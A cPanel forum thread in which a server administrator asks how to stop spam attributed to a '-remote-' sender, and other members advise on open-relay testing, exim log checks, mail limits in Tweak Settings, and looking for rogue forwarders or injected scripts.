SPAM from -Remote- user

Tornado

Active Member
Jul 17, 2007
43
1
58
Iran
Hi
unfortunately from my server sending many spam from -remote- user which i could not find any users...

i dont know how i can stop this
see the screenshot

i fight with this about 40 days..

sometimes datacenter got suspend my server ...

please help us

thanksScreen Shot 2018-09-28 at 4.10.20 PM.png Screen Shot 2018-09-28 at 4.10.08 PM.png
 

keat63

Well-Known Member
Nov 20, 2014
1,916
263
113
cPanel Access Level
Root Administrator
While we wait for the experts to come along, do you recognise the 195.201.x.x IP address.

Do you have SPF and DKIM configured for your domain.
 
Last edited:

keat63

Well-Known Member
Nov 20, 2014
1,916
263
113
cPanel Access Level
Root Administrator
Lets see if you are an open relay.

Maybe check the following in WHM.


Tweak Settings >> Mail >> Initial default/catch-all forwarder destination
Change this to 'Fail'
 

sparek-3

Well-Known Member
Aug 10, 2002
2,035
228
368
cPanel Access Level
Root Administrator
Yea, perhaps someone with a better understanding of the Mail Stats feature thingy in cPanel/WHM will be able to help. I don't use that feature, so I really don't understand what all is being displayed here.

But outside of that, I would recommend examining the logs for one of the specific message ids listed here, i.e.:

cat /var/log/exim_mainlog | grep 1g5ry3-000AQu-2Q

That's how I diagnose issues like this.

If you copy that information into this thread, be sure to redact any confidential or identifying information.
 

garconcn

Well-Known Member
Oct 29, 2009
159
14
68
Can you click on the "View Message" action on one email, then, click "Show Control Data", check "Mail control Data" to find the cpanel username or email address, those might be the one got hacked.

In tweak settings >> Mail >> Number of emails a domain may send per day before the system sends a notification >> Change from unlimited to a number, you may get notification about which account sent lots of emails.

Also, in tweak settings, set following:

Maximum percentage of failed or deferred messages a domain may send per hour: I use 25%
Number of failed or deferred messages a domain may send before protections can be triggered: I use 25

This will stop the user to send email if they've too many failed messages.
 

Tornado

Active Member
Jul 17, 2007
43
1
58
Iran
While we wait for the experts to come along, do you recognise the 195.201.x.x IP address.

Do you have SPF and DKIM configured for your domain.
Hi
its MAIN IP

Lets see if you are an open relay.

Maybe check the following in WHM.


Tweak Settings >> Mail >> Initial default/catch-all forwarder destination
Change this to 'Fail'
its already set to Fail

everything email sent from :
Sender User: -remote-

i want stop sending email from -Remote- user

how i can stop it
 

rpvw

Well-Known Member
Jul 18, 2013
1,101
465
113
UK
cPanel Access Level
Root Administrator
I would think twice before you disallow remote senders - it may have a consequence that no one will be able to send legitimate mail to any of the domains hosted on your server.

To test if your server is an open relay use the following website:
Email Server Test - Online SMTP diagnostics tool - MxToolbox

Check for the SMTP Open Relay line - if it says OK - Not an open relay - you are fine.

As long as your server is not an open relay, your mail system looks as if it is doing what it was designed to do - rejecting relay attempts.

See Tweak Settings - Mail - Version 74 Documentation - cPanel Documentation and ensure you have followed all the security suggestions, notes and warnings.

You may also like to check the various Tweak Settings for the word spam, as well as the Exim Configuration Manager (the default values are always a good place to start) and you may want to consider enabling and configuring:
Scan outgoing messages for spam and reject based on defined Apache SpamAssassin™ score (Minimum: 0.1; Maximum: 99.9)

Hope this helps
 
  • Like
Reactions: Tornado

rpvw

Well-Known Member
Jul 18, 2013
1,101
465
113
UK
cPanel Access Level
Root Administrator
I had another thought:

Check that no-one has configured a forwarder that shouldn't be there - we have seen several cases of email accounts having been hacked and forwarders set up for the purpose of spamming from supposedly legitimate accounts.

You might also want to check that your users have not had any scripts injected or uploaded to their /public_html space that might trigger a mail event from a specially crafted browser request.

Good luck
 

kdean

Well-Known Member
Oct 19, 2012
376
65
78
Orlando, FL
cPanel Access Level
Root Administrator
I'm confused. His screenshots show that the server is already rejecting the relay attempts, so everything is good. So, what's the problem?

Remote is any email coming in from outside the server, so you can't block that. Remote senders trying to relay through your server to another remote address are being rejected(22,957), so that's correct.

The 64 successful ones are likely local deliveries/incoming mail.
 

Tornado

Active Member
Jul 17, 2007
43
1
58
Iran
I had another thought:

Check that no-one has configured a forwarder that shouldn't be there - we have seen several cases of email accounts having been hacked and forwarders set up for the purpose of spamming from supposedly legitimate accounts.

You might also want to check that your users have not had any scripts injected or uploaded to their /public_html space that might trigger a mail event from a specially crafted browser request.

Good luck
Hi
how i can find which users set forwarders ?

To add, turn on your Authentication column and it was tell you "unauthorized", "localdelivery" or "forwarder".
from where i can turn on Authentication ?
 

Tornado

Active Member
Jul 17, 2007
43
1
58
Iran
Hi
thanks guys
is there possible completely disable sending email from Remote user?

because i feeling someone use our mail sevrer as remote
 

rpvw

Well-Known Member
Jul 18, 2013
1,101
465
113
UK
cPanel Access Level
Root Administrator
If you are going to disable remote mail (which is ALL mail sent TO your server) - you may as well just stop the mail daemons, and use some external mailer service.

We seem to be going around in circles with you asking the same question over and over again. I am sorry if you don't like the answers, but they are unlikely to change to something you want to hear.

Since you don't seem to have got a grip on this at all, I suggest you retain the services of a server administrator to help you - see System Administration Services | cPanel Forums for available services

If you want to continue to learn about preventing mail abuse - this is a good place to start - How to Prevent Email Abuse - cPanel Knowledge Base - cPanel Documentation
 
  • Like
Reactions: cPanelLauren

kdean

Well-Known Member
Oct 19, 2012
376
65
78
Orlando, FL
cPanel Access Level
Root Administrator
Hi
thanks guys
is there possible completely disable sending email from Remote user?

because i feeling someone use our mail sevrer as remote
In the evidence you've shown so far, attempts to use your server as a relay are being rejected. This is correct. Spammers will continue to try, but it won't work. So unless you show evidence of spam emails being sent through your server by a local account or script. Not all errors in the mail log are bad. Some and many in your case are indicating the correct response to relay attempts.
 
  • Like
Reactions: Tornado and rpvw

Tornado

Active Member
Jul 17, 2007
43
1
58
Iran
Hi
finally today datacenter contact us and send Warning... :

==
It has come to our attention that the IP address of a server you have with us is sending emails to Microsoft accounts (live.com, outlook.com, hotmail.com and msn.com), and that these emails are being marked as spam by the recipients.
==
here logs

- Removed -
 
Last edited by a moderator:

cPanelLauren

Product Owner
Staff member
Nov 14, 2017
13,296
1,271
313
Houston
The answers provided in this thread are pretty comprehensive but @Tornado if you're still experiencing issues please open a ticket using the link in my signature? Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.


Thanks!